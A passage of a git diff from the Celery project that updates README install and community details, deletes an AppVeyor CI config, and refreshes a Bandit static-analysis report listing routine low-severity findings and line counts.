+- Python 2.4: Celery series 2.2 or earlier.
- Python 2.7: Celery 4.x series.
+- Python 3.6: Celery 5.1 or earlier.
Celery is a project with minimal funding,
so we don't support Microsoft Windows.
@@ -89,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.0 coming from previous versions then you should read our
+new to Celery v5.2.0 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
@@ -106,6 +107,8 @@ getting started tutorials:
.. _`Next steps`:
http://docs.celeryproject.org/en/latest/getting-started/next-steps.html
+ You can also get started with Celery by using CloudAMQP, a hosted broker transport. CloudAMQP, the largest hosting provider of RabbitMQ, is a proud sponsor of Celery.
+
Celery is...
=============
@@ -116,7 +119,9 @@ Celery is...
It has an active, friendly community you can talk to for support,
like at our `mailing-list`_, or the IRC channel.
- Here's one of the simplest applications you can make::
+ Here's one of the simplest applications you can make:
+
+ .. code-block:: python
from celery import Celery
@@ -253,9 +258,9 @@ separating them by commas.
::
- $ pip install "celery[librabbitmq]"
+ $ pip install "celery[amqp]"
- $ pip install "celery[librabbitmq,redis,auth,msgpack]"
+ $ pip install "celery[amqp,redis,auth,msgpack]"
The following bundles are available:
@@ -283,8 +288,8 @@ Concurrency
Transports and Backends
~~~~~~~~~~~~~~~~~~~~~~~
-:``celery[librabbitmq]``:
- for using the librabbitmq C library.
+:``celery[amqp]``:
+ for using the RabbitMQ amqp python library.
:``celery[redis]``:
for using Redis as a message transport or as a result backend.
@@ -417,10 +422,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
-network.
+Come chat with us on IRC. The **#celery** channel is located at the
+`Libera Chat`_ network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://libera.chat/
.. _bug-tracker:
@@ -498,9 +503,9 @@ file in the top distribution directory for the full license text.
.. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround
-.. |build-status| image:: https://secure.travis-ci.org/celery/celery.png?branch=master
+.. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg
:alt: Build status
- :target: https://travis-ci.org/celery/celery
+ :target: https://github.com/celery/celery/actions/workflows/python-package.yml
.. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master
:target: https://codecov.io/github/celery/celery?branch=master
diff --git a/appveyor.yml b/appveyor.yml
deleted file mode 100644
index 666932d9540..00000000000
--- a/appveyor.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-environment:
-
- global:
- # SDK v7.0 MSVC Express 2008's SetEnv.cmd script will fail if the
- # /E:ON and /V:ON options are not enabled in the batch script intepreter
- # See: https://stackoverflow.com/a/13751649/163740
- WITH_COMPILER: "cmd /E:ON /V:ON /C .\\extra\\appveyor\\run_with_compiler.cmd"
-
- matrix:
-
- # Pre-installed Python versions, which Appveyor may upgrade to
- # a later point release.
- # See: https://www.appveyor.com/docs/installed-software#python
-
- - PYTHON: "C:\\Python36-x64"
- PYTHON_VERSION: "3.6.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.6-unit"
-
- - PYTHON: "C:\\Python37-x64"
- PYTHON_VERSION: "3.7.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.7-unit"
-
- - PYTHON: "C:\\Python38-x64"
- PYTHON_VERSION: "3.8.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.8-unit"
-
-
-init:
- - "ECHO %PYTHON% %PYTHON_VERSION% %PYTHON_ARCH%"
-
-install:
- - "powershell extra\\appveyor\\install.ps1"
- - "%PYTHON%/python -m pip install -U pip setuptools tox"
- - "%PYTHON%/Scripts/pip.exe install -U eventlet"
- - "%PYTHON%/Scripts/pip.exe install -U -r requirements/extras/thread.txt"
-
-build: off
-
-test_script:
- - "%WITH_COMPILER% %PYTHON%/Scripts/tox -v -- -v"
-
-after_test:
- - "%WITH_COMPILER% %PYTHON%/python setup.py bdist_wheel"
-
-artifacts:
- - path: dist\*
-
-cache:
- - '%LOCALAPPDATA%\pip\Cache'
-
-#on_success:
-# - TODO: upload the content of dist/*.whl to a public wheelhouse
diff --git a/bandit.json b/bandit.json
index 95a9201f312..fa207a9c734 100644
--- a/bandit.json
+++ b/bandit.json
@@ -1,17 +1,17 @@
{
"errors": [],
- "generated_at": "2020-08-06T14:09:58Z",
+ "generated_at": "2021-11-08T00:55:15Z",
"metrics": {
"_totals": {
- "CONFIDENCE.HIGH": 38.0,
+ "CONFIDENCE.HIGH": 40.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 2.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 38.0,
+ "SEVERITY.LOW": 40.0,
"SEVERITY.MEDIUM": 2.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 29309,
+ "loc": 29546,
"nosec": 0
},
"celery/__init__.py": {
@@ -23,7 +23,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 129,
+ "loc": 126,
"nosec": 0
},
"celery/__main__.py": {
@@ -35,7 +35,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 9,
+ "loc": 12,
"nosec": 0
},
"celery/_state.py": {
@@ -71,7 +71,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 528,
+ "loc": 503,
"nosec": 0
},
"celery/app/annotations.py": {
@@ -95,7 +95,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 43,
+ "loc": 50,
"nosec": 0
},
"celery/app/backends.py": {
@@ -119,7 +119,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 964,
+ "loc": 1028,
"nosec": 0
},
"celery/app/builtins.py": {
@@ -143,7 +143,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 383,
+ "loc": 607,
"nosec": 0
},
"celery/app/defaults.py": {
@@ -155,7 +155,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 365,
+ "loc": 361,
"nosec": 0
},
"celery/app/events.py": {
@@ -179,7 +179,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 197,
+ "loc": 198,
"nosec": 0
},
"celery/app/registry.py": {
@@ -203,7 +203,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 110,
+ "loc": 107,
"nosec": 0
},
"celery/app/task.py": {
@@ -215,7 +215,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 740,
+ "loc": 779,
"nosec": 0
},
"celery/app/trace.py": {
@@ -227,7 +227,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 535,
+ "loc": 560,
"nosec": 0
},
"celery/app/utils.py": {
@@ -239,7 +239,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 315,
"nosec": 0
},
"celery/apps/__init__.py": {
@@ -275,7 +275,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 409,
+ "loc": 426,
"nosec": 0
},
"celery/apps/worker.py": {
@@ -287,7 +287,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 291,
+ "loc": 304,
"nosec": 0
},
"celery/backends/__init__.py": {
@@ -299,19 +299,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 17,
- "nosec": 0
- },
- "celery/backends/amqp.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 265,
+ "loc": 1,
"nosec": 0
},
"celery/backends/arangodb.py": {
@@ -323,7 +311,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 199,
+ "loc": 201,
"nosec": 0
},
"celery/backends/asynchronous.py": {
@@ -347,7 +335,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 107,
+ "loc": 126,
"nosec": 0
},
"celery/backends/base.py": {
@@ -359,7 +347,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 773,
+ "loc": 809,
"nosec": 0
},
"celery/backends/cache.py": {
@@ -371,7 +359,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 117,
+ "loc": 118,
"nosec": 0
},
"celery/backends/cassandra.py": {
@@ -383,7 +371,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 178,
+ "loc": 174,
"nosec": 0
},
"celery/backends/consul.py": {
@@ -395,7 +383,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 74,
+ "loc": 79,
"nosec": 0
},
"celery/backends/cosmosdbsql.py": {
@@ -419,7 +407,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 85,
+ "loc": 79,
"nosec": 0
},
"celery/backends/couchdb.py": {
@@ -431,7 +419,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 77,
"nosec": 0
},
"celery/backends/database/__init__.py": {
@@ -467,7 +455,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 47,
+ "loc": 68,
"nosec": 0
},
"celery/backends/dynamodb.py": {
@@ -503,7 +491,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 89,
"nosec": 0
},
"celery/backends/mongodb.py": {
@@ -515,7 +503,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 241,
+ "loc": 243,
"nosec": 0
},
"celery/backends/redis.py": {
@@ -527,19 +515,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 448,
- "nosec": 0
- },
- "celery/backends/riak.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 105,
+ "loc": 499,
"nosec": 0
},
"celery/backends/rpc.py": {
@@ -563,19 +539,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 65,
+ "loc": 66,
"nosec": 0
},
"celery/beat.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 553,
+ "loc": 567,
"nosec": 0
},
"celery/bin/__init__.py": {
@@ -599,7 +575,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 268,
+ "loc": 274,
"nosec": 0
},
"celery/bin/base.py": {
@@ -611,7 +587,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 180,
+ "loc": 219,
"nosec": 0
},
"celery/bin/beat.py": {
@@ -623,7 +599,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 58,
+ "loc": 63,
"nosec": 0
},
"celery/bin/call.py": {
@@ -635,7 +611,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 66,
+ "loc": 69,
"nosec": 0
},
"celery/bin/celery.py": {
@@ -647,7 +623,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 127,
+ "loc": 176,
"nosec": 0
},
"celery/bin/control.py": {
@@ -659,7 +635,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 164,
+ "loc": 181,
"nosec": 0
},
"celery/bin/events.py": {
@@ -671,7 +647,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 79,
"nosec": 0
},
"celery/bin/graph.py": {
@@ -683,7 +659,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 157,
+ "loc": 162,
"nosec": 0
},
"celery/bin/list.py": {
@@ -695,7 +671,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 25,
+ "loc": 28,
"nosec": 0
},
"celery/bin/logtool.py": {
@@ -707,7 +683,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 125,
"nosec": 0
},
"celery/bin/migrate.py": {
@@ -719,7 +695,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 54,
+ "loc": 57,
"nosec": 0
},
"celery/bin/multi.py": {
@@ -731,7 +707,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 372,
+ "loc": 375,
"nosec": 0
},
"celery/bin/purge.py": {
@@ -743,7 +719,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 55,
+ "loc": 60,
"nosec": 0
},
"celery/bin/result.py": {
@@ -755,7 +731,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 22,
+ "loc": 25,
"nosec": 0
},
"celery/bin/shell.py": {
@@ -767,7 +743,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 143,
+ "loc": 144,
"nosec": 0
},
"celery/bin/upgrade.py": {
@@ -779,7 +755,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 69,
+ "loc": 74,
"nosec": 0
},
"celery/bin/worker.py": {
@@ -791,7 +767,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 306,
"nosec": 0
},
"celery/bootsteps.py": {
@@ -815,7 +791,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 1113,
+ "loc": 1143,
"nosec": 0
},
"celery/concurrency/__init__.py": {
@@ -827,7 +803,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 19,
+ "loc": 22,
"nosec": 0
},
"celery/concurrency/asynpool.py": {
@@ -863,7 +839,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 114,
+ "loc": 145,
"nosec": 0
},
"celery/concurrency/gevent.py": {
@@ -887,7 +863,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 131,
+ "loc": 132,
"nosec": 0
},
"celery/concurrency/solo.py": {
@@ -911,7 +887,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 33,
+ "loc": 30,
"nosec": 0
},
"celery/contrib/__init__.py": {
@@ -959,7 +935,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 146,
+ "loc": 153,
"nosec": 0
},
"celery/contrib/rdb.py": {
@@ -1019,7 +995,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 175,
+ "loc": 176,
"nosec": 0
},
"celery/contrib/testing/mocks.py": {
@@ -1055,7 +1031,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 130,
+ "loc": 141,
"nosec": 0
},
"celery/events/__init__.py": {
@@ -1139,7 +1115,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 87,
+ "loc": 88,
"nosec": 0
},
"celery/events/state.py": {
@@ -1151,7 +1127,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 569,
+ "loc": 570,
"nosec": 0
},
"celery/exceptions.py": {
@@ -1163,19 +1139,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 186,
- "nosec": 0
- },
- "celery/five.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 4,
+ "loc": 196,
"nosec": 0
},
"celery/fixups/__init__.py": {
@@ -1235,7 +1199,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 202,
+ "loc": 204,
"nosec": 0
},
"celery/loaders/default.py": {
@@ -1259,7 +1223,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 426,
+ "loc": 404,
"nosec": 0
},
"celery/platforms.py": {
@@ -1271,7 +1235,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 623,
+ "loc": 631,
"nosec": 0
},
"celery/result.py": {
@@ -1283,7 +1247,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 866,
+ "loc": 843,
"nosec": 0
},
"celery/schedules.py": {
@@ -1382,30 +1346,6 @@
"loc": 95,
"nosec": 0
},
- "celery/task/__init__.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 39,
- "nosec": 0
- },
- "celery/task/base.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 184,
- "nosec": 0
- },
"celery/utils/__init__.py": {
"CONFIDENCE.HIGH": 0.0,
"CONFIDENCE.LOW": 0.0,
@@ -1439,7 +1379,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 611,
+ "loc": 595,
"nosec": 0
},
"celery/utils/debug.py": {
@@ -1490,18 +1430,6 @@
"loc": 262,
"nosec": 0
},
- "celery/utils/encoding.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 5,
- "nosec": 0
- },
"celery/utils/functional.py": {
"CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
@@ -1511,7 +1439,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 261,
+ "loc": 290,
"nosec": 0
},
"celery/utils/graph.py": {
@@ -1535,7 +1463,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 115,
"nosec": 0
},
"celery/utils/iso8601.py": {
@@ -1559,7 +1487,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 215,
"nosec": 0
},
"celery/utils/nodenames.py": {
@@ -1595,7 +1523,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 188,
+ "loc": 190,
"nosec": 0
},
"celery/utils/serialization.py": {
@@ -1607,7 +1535,7 @@
"SEVERITY.LOW": 4.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 209,
"nosec": 0
},
"celery/utils/static/__init__.py": {
@@ -1655,7 +1583,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 135,
+ "loc": 136,
"nosec": 0
},
"celery/utils/threads.py": {
@@ -1775,7 +1703,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 470,
+ "loc": 493,
"nosec": 0
},
"celery/worker/consumer/control.py": {
@@ -1859,7 +1787,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 423,
+ "loc": 424,
"nosec": 0
},
"celery/worker/heartbeat.py": {
@@ -1883,7 +1811,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 79,
+ "loc": 92,
"nosec": 0
},
"celery/worker/pidbox.py": {
@@ -1907,19 +1835,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 536,
+ "loc": 578,
"nosec": 0
},
"celery/worker/state.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 200,
+ "loc": 208,
"nosec": 0
},
"celery/worker/strategy.py": {
@@ -1931,7 +1859,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 166,
+ "loc": 175,
"nosec": 0
},
"celery/worker/worker.py": {
@@ -1963,353 +1891,369 @@
"test_name": "blacklist"
},
{
- "code": "196 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n197 pipe = Popen(argstr, env=env)\n198 return self.handle_process_exit(\n",
+ "code": "216 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n217 pipe = Popen(argstr, env=env)\n218 return self.handle_process_exit(\n",
"filename": "celery/apps/multi.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "subprocess call - check for execution of untrusted input.",
- "line_number": 197,
+ "line_number": 217,
"line_range": [
- 197
+ 217
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b603_subprocess_without_shell_equals_true.html",
"test_id": "B603",
"test_name": "subprocess_without_shell_equals_true"
},
{
- "code": "322 ])\n323 os.execv(sys.executable, [sys.executable] + sys.argv)\n324 \n",
+ "code": "341 ])\n342 os.execv(sys.executable, [sys.executable] + sys.argv)\n343 \n",
"filename": "celery/apps/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 323,
+ "line_number": 342,
"line_range": [
- 323
+ 342
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "74 self.set(key, b'test value')\n75 assert self.get(key) == b'test value'\n76 self.delete(key)\n",
+ "code": "72 self.set(key, b'test value')\n73 assert self.get(key) == b'test value'\n74 self.delete(key)\n",
"filename": "celery/backends/filesystem.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 75,
+ "line_number": 73,
"line_range": [
- 75
+ 73
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "89 path = executable\n90 os.execv(path, [path] + argv)\n91 except Exception: # pylint: disable=broad-except\n",
+ "code": "6 import os\n7 import shelve\n8 import sys\n",
+ "filename": "celery/beat.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 7,
+ "line_range": [
+ 7
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
+ },
+ {
+ "code": "124 path = executable\n125 os.execv(path, [path] + argv)\n126 return EX_OK\n",
"filename": "celery/bin/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 90,
+ "line_number": 125,
"line_range": [
- 90
+ 125
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "23 from numbers import Integral\n24 from pickle import HIGHEST_PROTOCOL\n25 from time import sleep\n",
+ "code": "22 from numbers import Integral\n23 from pickle import HIGHEST_PROTOCOL\n24 from struct import pack, unpack, unpack_from\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with HIGHEST_PROTOCOL module.",
- "line_number": 24,
+ "line_number": 23,
"line_range": [
- 24
+ 23
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
